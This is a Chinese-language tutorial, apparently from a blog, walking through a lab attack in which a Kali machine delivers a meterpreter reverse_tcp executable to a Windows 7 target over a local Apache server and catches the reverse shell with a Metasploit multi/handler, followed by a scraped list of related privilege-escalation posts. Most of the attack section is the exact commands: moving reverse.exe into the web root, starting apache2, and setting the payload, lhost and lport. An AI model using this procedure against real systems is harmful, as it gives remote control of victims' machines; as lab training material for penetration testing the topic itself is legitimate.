环境

攻击机:Kali ip:192.168.50.183
靶机:Win7(x64)
两者在同一个C段!!!!

生成payload

首先我们生成一个payload文件,如果靶机是64位的建议生成64位的payload,以免后续提权过程受阻
在线快速生成payload网站
这里的IP设置为KaliIP,端口不要与其他服务冲突

接下来我们需要把payload下载到靶机win7(如果有能者可以直接拖拽进靶机也可以)
把下载好的文件放至网页,由靶机win7通过访问网页下载

mv reverse.exe /var/www/html/

记得开启Kali的apache服务,我这里使用的是apache2

systemctl start apache2

设置监听

这样我们的payload就准备好了,接下来我们先设置监听
首先打开msfconsole模块

msfconsole

使用监听

use exploit/multi/handler

然后设置监听的payload,靶机是32位的可以把x64删掉

set payload windows/x64/meterpreter/reverse_tcp

接下来设置监听的IP和端口

show options
set lhost 192.168.50.183
set lport 4444
run

现在Kali处于监听状态,我们去靶机把payload下载运行
在靶机访问192.168.50.183/reverse.exe,下载好后运行文件
再返回Kali看到这个红色框框里的东西就代表已经反弹成功了

利用msf实现反弹shell与提权(细节过程秒懂)相关推荐

  1. 网络安全——使用反弹木马进行提权获取主机Shell

    使用反弹木马进行提权获取主机Shell 第一步,打开网络拓扑,启动实验虚拟机,分别查看虚拟机IP地址: Kali Linux Linux Windows XP 第二步,使用命令nmap -sS 172 ...

  2. mysql反弹提权_MySQL数据库反弹端口连接提权

    [51CTO.com原创稿件]在渗透或者安全评估时,有可能遇到一些比较奇葩的环境,即使通过Mysql root账号和密码获取了webshell,由于无法执行命令.在一般的情况下,也就放弃了.但其实可以 ...

  3. msf监听php反弹shell,使用msf进行反弹shell+内网渗透

    首先说明一点,反弹shell的前提是该主机可以执行咱们的恶意命令 反弹shell的原理与灰鸽子的原理是类似的,就是在靶机上执行一个咱们msf精心构造的客户端,使靶机主动回连咱们攻击机的某个端口.下面开 ...

  4. Potato家族本地提权细节

    本文结合POC源码,研究Potato家族本地提权细节 Feature or vulnerability 该提权手法的前提是拥有SeImpersonatePrivilege或SeAssignPrimar ...

  5. 获取Shell(提权)后的操作(windows、Linux)

    对于Windows系统主机和Linux系统主机,获取Shell后的操作都不同. Windows 当我们通过对Web服务器进行渗透,拿到了该Web服务器的shell后,可以执行系统命令后,我们该如何操作 ...

  6. 提权命令_利用Linux文本操作命令ed进行提权

    本文我将为大家介绍一个面向行的文本编辑器命令"ed",它主要用于生成,显示,更改和操作文本文件.所有ed命令都在行或行范围内执行操作:例如,"d"命令删除行:& ...

  7. 靶机DC-1练习:借助msfconsole进行漏洞查询利用getshell后,采用suid提权

    1.靶机IP地址发现 2.查看靶机版本和服务 -sV:用来扫描目标主机和端口上运行的软件的版本 -p-:扫描0-65535全部端口 -sS/sT/sA/sW/sM:指定使用 TCP SYN/Conne ...

  8. linux 下ssh端口反弹,利用ssh隧道反弹shell

    说明 本文旨在分析rssh的源代码来学习利用ssh隧道来反弹shell.整个rssh只有1个347行的main文件,所以整体的逻辑结构也比较好分析.关于SSH端口转发的知识可以看实战SSH端口转发这篇 ...

  9. WIN8系统的远程桌面漏洞 利用QQ拼音纯净版实现提权

    前言 发现这个漏洞的时候, 笔者正在机房上课.正想用3389远程桌面去控制宿舍电脑的时候,因为重做系统忘记自己的IP地址,因此就随手扫描了一下IP段开3389端口的电脑. 没想到就随手扫描到一台WIN ...

最新文章

  1. 钉钉、支付宝合种树,2-4天领证,限量9个名额
  2. Ueditor的两种定制方式
  3. libtorch调用模型
  4. ML_Logistic_Regression
  5. 区块链开发之搭建以太坊私有链
  6. PHP Hashtable实现源码分析
  7. 系统架构设计师 - 系统可靠性设计
  8. Linux/Mac修改conda源,方便安装pytorch等
  9. Secure CRT修改文件夹的颜色
  10. 程序员面试金典——9.6合法序号序列判断
  11. BGP Ethernet Virtual Private Network技术原理
  12. (十五)TcpClient
  13. DNS各地延迟排行榜
  14. Multi-Scale Context Aggregation By Dilated Convolutions
  15. CC2640R2F BLE5.0 蓝牙协议栈GAP Bond管理和LE安全连接
  16. 拼多多资深程序员带你了解 ”砍一刀“的设计与实现
  17. CentOS镜像介绍及下载
  18. Lua(二)数据类型+变量
  19. This is probably not a problem with npm. There is likely additional logging output above. 报错
  20. Windows 如何配置 scratch 3.0 GUI

热门文章

  1. Android 全新MVVM框架搭建
  2. 在Mac上制作树莓派SD镜像
  3. LINUX乱码文件重命名
  4. 基于 SpringBoot+WebSocket 无DB实现在线聊天室(附源码)
  5. 电脑中病毒,这样处置
  6. node.js全局变量说明
  7. 签字后被开除_员工抵制搬迁闹停工被开除,能否要求公司支付赔偿金?
  8. redis启动,停止,重启
  9. openmediavault安装OMV-Extras插件
  10. 创建型:Java单例模式